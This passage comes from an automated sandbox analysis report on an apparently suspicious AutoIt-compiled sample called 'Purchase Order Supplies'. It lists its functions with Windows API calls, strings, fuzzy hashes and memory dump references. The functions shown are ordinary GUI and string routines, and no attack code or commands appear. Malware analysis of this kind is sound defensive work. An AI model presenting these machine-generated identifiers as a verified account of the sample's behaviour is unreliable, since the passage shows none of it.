                          • Instruction Fuzzy Hash: 4A127230504201DFDB24CF24C988BAABBE5FF45305F584969F999DB2A2C731EC46DBA1
                          Function 00CFC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CFC598
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CFC64E
                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CFC669
                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CFC925
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: 0
                          • API String ID: 2326795674-4108050209
                          • Opcode ID: 19d89e3a86d359554e730c6805c8ecf6eff33cae53bfc1074d788bf347b77d38
                          • Instruction ID: 65773ca260951824af43eeaace88aa91e0d34146966afd743a7e4f9a4dface21
                          • Opcode Fuzzy Hash: 19d89e3a86d359554e730c6805c8ecf6eff33cae53bfc1074d788bf347b77d38
                          • Instruction Fuzzy Hash: ADF1F17120830DAFE7618F24CAC4BBABBE5FF45354F044519F6A4D22A1C774DA44EB62
                          Function 00CF6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,00D2DBF0), ref: 00CF6245
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          • Opcode ID: 7c884e5d50d79720e77e2cebfea78bd7a680b3ccc987f1c26235bb7591d61a39
                          • Instruction ID: 979eda48df9fb6aa996b7ec526f8b5ae81ab20a54fd685a124a86fae6214e91c
                          • Opcode Fuzzy Hash: 7c884e5d50d79720e77e2cebfea78bd7a680b3ccc987f1c26235bb7591d61a39
                          • Instruction Fuzzy Hash: 79C1913420420A8BCB44EF54C451B7E77A2AF96394F04486CF9969B3A6CB34DD4BDB83
                          Function 00CFD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00CFD3BE
                          • SetTextColor.GDI32(?,?), ref: 00CFD3C2
                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD3D8
                          • GetSysColor.USER32(0000000F), ref: 00CFD3E3
                          • CreateSolidBrush.GDI32(?), ref: 00CFD3E8
                          • GetSysColor.USER32(00000011), ref: 00CFD400
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD40E
                          • SelectObject.GDI32(?,00000000), ref: 00CFD41F
                          • SetBkColor.GDI32(?,00000000), ref: 00CFD428
                          • SelectObject.GDI32(?,?), ref: 00CFD435
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD454
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD46B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD480
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD4A8
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFD4CF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00CFD4ED
                          • DrawFocusRect.USER32(?,?), ref: 00CFD4F8
                          • GetSysColor.USER32(00000011), ref: 00CFD506
                          • SetTextColor.GDI32(?,00000000), ref: 00CFD50E
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFD522
                          • SelectObject.GDI32(?,00CFD0B5), ref: 00CFD539
                          • DeleteObject.GDI32(?), ref: 00CFD544
                          • SelectObject.GDI32(?,?), ref: 00CFD54A
                          • DeleteObject.GDI32(?), ref: 00CFD54F
                          • SetTextColor.GDI32(?,?), ref: 00CFD555
                          • SetBkColor.GDI32(?,?), ref: 00CFD55F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 87b996ec69b446aea44cf67ce2d4adaefa5129b3ba012e96f2a5ff2ad017adf2
                          • Instruction ID: d8b8c923ba50a870e8f43b5217a95b4abfd110d27990c0cc7aeff7c3f45b838e
                          • Opcode Fuzzy Hash: 87b996ec69b446aea44cf67ce2d4adaefa5129b3ba012e96f2a5ff2ad017adf2
                          • Instruction Fuzzy Hash: 21512E71900218BFDF109FA4DC48EEE7B7AFB08320F108515FA15EB2A1DB759A41DB60
                          Function 00CFB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CFB5C0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB5D1
                          • CharNextW.USER32(0000014E), ref: 00CFB600
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CFB641
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CFB657
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB668
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CFB685
                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFB6D7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CFB6ED
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFB71E
                          • _memset.LIBCMT ref: 00CFB743
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CFB78C
                          • _memset.LIBCMT ref: 00CFB7EB
                          • SendMessageW.USER32 ref: 00CFB815
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CFB86D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00CFB91A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CFB93C
                          • GetMenuItemInfoW.USER32(?), ref: 00CFB986
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CFB9B3
                          • DrawMenuBar.USER32(?), ref: 00CFB9C2
                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFB9EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: 10d7c0d2a5ce5916cb8e214d9a1eb62aee3a3e07eab9380ede11d921cf87e17b
                          • Instruction ID: 8e66f08349c2d0d8c9189ec2e958311a919c8b314e5d1c45276770419cf3d78a
                          • Opcode Fuzzy Hash: 10d7c0d2a5ce5916cb8e214d9a1eb62aee3a3e07eab9380ede11d921cf87e17b
                          • Instruction Fuzzy Hash: B2E1697590021CAADF609F61CC84AFE7BB9FF05750F108156FA29AA290DB748E41DF62
                          Function 00CF744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00CF7587
                          • GetDesktopWindow.USER32 ref: 00CF759C
                          • GetWindowRect.USER32(00000000), ref: 00CF75A3
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF7605
                          • DestroyWindow.USER32(?), ref: 00CF7631
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF765A
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF7678
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF769E
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00CF76B3
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF76C6
                          • IsWindowVisible.USER32(?), ref: 00CF76E6
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF7701
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF7715
                          • GetWindowRect.USER32(?,?), ref: 00CF772D
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00CF7753
                          • GetMonitorInfoW.USER32 ref: 00CF776D
                          • CopyRect.USER32(?,?), ref: 00CF7784
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00CF77EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: af8ca66c04925baef7afeb526918bd9bc7982468f2dd2bc29791e54c98c75902
                          • Instruction ID: f2268a046142a09eea0dca5ef56f632f9b5b7b51e0c7fb360acee57292d36c57
                          • Opcode Fuzzy Hash: af8ca66c04925baef7afeb526918bd9bc7982468f2dd2bc29791e54c98c75902
                          • Instruction Fuzzy Hash: 90B18171608345AFDB44DF64C948B6ABBE5FF88310F008A1DF699DB291DB70E905CB62
                          Function 00CAA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA839
                          • GetSystemMetrics.USER32(00000007), ref: 00CAA841
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA86C
                          • GetSystemMetrics.USER32(00000008), ref: 00CAA874
                          • GetSystemMetrics.USER32(00000004), ref: 00CAA899
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CAA8B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00CAA8C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CAA8F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CAA90D
                          • GetClientRect.USER32(00000000,000000FF), ref: 00CAA92B
                          • GetStockObject.GDI32(00000011), ref: 00CAA947
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAA952
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • SetTimer.USER32(00000000,00000000,00000028,00CAACEE), ref: 00CAA979
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: efe678b3c7b1a9703b9c46d60189cae663f150b9c5bf3d057fcf4837ebfcf41b
                          • Instruction ID: 46c0ecead02624c88e19478b9c0a70cdcd35dede41508f90a5ac0eab1fc839cc
                          • Opcode Fuzzy Hash: efe678b3c7b1a9703b9c46d60189cae663f150b9c5bf3d057fcf4837ebfcf41b
                          • Instruction Fuzzy Hash: BBB16875A0030AAFDB14DFA8DC45BEE7BB5FB09319F108229FA15E62D0DB749801DB61
                          Function 00CF69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00CF6A52
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF6B12
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: a923969b384b1246907a9c9166f1a707bb209386f2f4c56a1e3a7d2316eb6f41
                          • Instruction ID: e3281c98917608bdb40f13218180a20b43b5615c42366f9b660738036dc4474d
                          • Opcode Fuzzy Hash: a923969b384b1246907a9c9166f1a707bb209386f2f4c56a1e3a7d2316eb6f41
                          • Instruction Fuzzy Hash: B5A171302042069BCB44EF14C991B7AB3A5FF45358F14896DF9A69B3D2DB30ED06EB52
                          Function 00CCE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCE6E1
                          • _wcscmp.LIBCMT ref: 00CCE6F2
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCE71A
                          • CharUpperBuffW.USER32(?,00000000), ref: 00CCE737
                          • _wcscmp.LIBCMT ref: 00CCE755
                          • _wcsstr.LIBCMT ref: 00CCE766
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCE79E
                          • _wcscmp.LIBCMT ref: 00CCE7AE
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCE7D5
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCE81E
                          • _wcscmp.LIBCMT ref: 00CCE82E
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCE856
                          • GetWindowRect.USER32(00000004,?), ref: 00CCE8BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: 9ea5ce501d10636d3d9145091510ce84e9e755fd67b6bead69f45ba65a7dab35
                          • Instruction ID: 9ab7acee7feba1b6e6007b9c98dc62233148009eecd1f49661077253c8c28942
                          • Opcode Fuzzy Hash: 9ea5ce501d10636d3d9145091510ce84e9e755fd67b6bead69f45ba65a7dab35
                          • Instruction Fuzzy Hash: C4819C31008309ABDB15DF14C885FAA7BE8FF45714F04846EFDA99A096DB30DE46CBA1
                          Function 00CCE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: fbd04290590d8d271ab4be9dbcd742ef38f11433d0785f56a027e1dd9cef8839
                          • Instruction ID: a7df1558f0c3a346edb95bc722234cffcb5d69177a1553eb2551bc32b746720f
                          • Opcode Fuzzy Hash: fbd04290590d8d271ab4be9dbcd742ef38f11433d0785f56a027e1dd9cef8839
                          • Instruction Fuzzy Hash: B6318E31944209ABDE15EB50CD93FFE73A45F21704FA00129F451710E5FF51AF08AA61
                          Function 00CCF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00CCF8AB
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCF8BD
                          • SetWindowTextW.USER32(?,?), ref: 00CCF8D4
                          • GetDlgItem.USER32(?,000003EA), ref: 00CCF8E9
                          • SetWindowTextW.USER32(00000000,?), ref: 00CCF8EF
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCF8FF
                          • SetWindowTextW.USER32(00000000,?), ref: 00CCF905
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCF926
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCF940
                          • GetWindowRect.USER32(?,?), ref: 00CCF949
                          • SetWindowTextW.USER32(?,?), ref: 00CCF9B4
                          • GetDesktopWindow.USER32 ref: 00CCF9BA
                          • GetWindowRect.USER32(00000000), ref: 00CCF9C1
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCFA0D
                          • GetClientRect.USER32(?,?), ref: 00CCFA1A
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCFA3F
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCFA6A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: 3570558996bd479bf60ce15d6df875f291205488b6fbf738c41d04ebebafec52
                          • Instruction ID: c5ba923ef7451b6c586ca28725183ce3b9974d48690534972ef39ed9601b5d06
                          • Opcode Fuzzy Hash: 3570558996bd479bf60ce15d6df875f291205488b6fbf738c41d04ebebafec52
                          • Instruction Fuzzy Hash: 5A514F70900709AFDB209FA8CD85FAEBBF6FF04704F00452DE596E26A0CB74A946CB10
                          Function 00CE01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                          Download Yara Rule
                          APIs
                          • _wcscpy.LIBCMT ref: 00CE026A
                          • _wcschr.LIBCMT ref: 00CE0278
                          • _wcscpy.LIBCMT ref: 00CE028F
                          • _wcscat.LIBCMT ref: 00CE029E
                          • _wcscat.LIBCMT ref: 00CE02BC
                          • _wcscpy.LIBCMT ref: 00CE02DD
                          • __wsplitpath.LIBCMT ref: 00CE03BA
                          • _wcscpy.LIBCMT ref: 00CE03DF
                          • _wcscpy.LIBCMT ref: 00CE03F1
                          • _wcscpy.LIBCMT ref: 00CE0406
                          • _wcscat.LIBCMT ref: 00CE041B
                          • _wcscat.LIBCMT ref: 00CE042D
                          • _wcscat.LIBCMT ref: 00CE0442
                            • Part of subcall function 00CDC890: _wcscmp.LIBCMT ref: 00CDC92A
                            • Part of subcall function 00CDC890: __wsplitpath.LIBCMT ref: 00CDC96F
                            • Part of subcall function 00CDC890: _wcscpy.LIBCMT ref: 00CDC982
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC995
                            • Part of subcall function 00CDC890: __wsplitpath.LIBCMT ref: 00CDC9BA
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC9D0
                            • Part of subcall function 00CDC890: _wcscat.LIBCMT ref: 00CDC9E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 2955681530-2806939583
                          • Opcode ID: bb21bf9e591122dde62bc036236b26df399dbdb1bfd4c74f105d5d91262fed34
                          • Instruction ID: eacaf3aaaa03afa1210d26b2321d5ea22d6698c510b52d49b0265f125d4a767f
                          • Opcode Fuzzy Hash: bb21bf9e591122dde62bc036236b26df399dbdb1bfd4c74f105d5d91262fed34
                          • Instruction Fuzzy Hash: 5491F471504341AFCB20EF50C855F9FB3E8AF84310F04485DF9999B2A1EB74EA88DB92
                          Function 00CFCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CFCD0B
                          • DestroyWindow.USER32(00000000,?), ref: 00CFCD83
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFCE04
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFCE26
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFCE35
                          • DestroyWindow.USER32(?), ref: 00CFCE52
